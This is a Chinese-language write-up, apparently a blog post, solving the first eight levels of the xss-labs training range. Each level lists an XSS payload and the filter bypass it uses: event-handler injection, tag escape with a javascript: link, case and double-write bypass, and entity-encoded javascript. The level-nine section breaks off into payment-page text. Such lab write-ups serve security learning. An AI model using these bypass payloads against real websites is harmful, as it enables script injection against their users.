xss-labs 靶场练习前九关

第一关

可以发现url为test

构建payload,将test改为<script>alert()</script>,按回车.

第二关

构造一个onclick属性," οnclick="alert(123)

第三关

利用onclick事件绕过,输入框输入 'οnclick='alert(1)

点击输入框完成本关

第四关

输入payload点击搜索后查看源代码

通过输入框后发现之前的payload变成了script alert()/script,于是我们可以猜想"<>"符号可能被实体化

利用onclick语句绕过,输入框输入

"οnclick="alert(1)

完成本关

第五关

输入<script>alert(1)</script>发现script被处理

意味着不能输入script标签了,换思路,用事件" οnfοcus="alert(1)

还是被处理,试试逃逸输入框,用其他标签来试试:

"><a href="javascript:alert(1)">jack</a>

输入后点击jack显示本关已完成。

第六关

输入<script>alert(1)</script>发现script被处理

尝试大小写绕过:">jack,通关成功

第七关

script直接被过滤

尝试双写绕过,alert(1),发现仍然不起作用

接下来 尝试闭合+双写,发现可以通关。

payload为

"><scrscriptipt>alert(1)</scscriptript>

第八关

发现被过滤了

unicode是支持所有的编码,尝试转换编码

unicode编码为:

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;

输入Unicode编码后,通关成功。

第九关

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值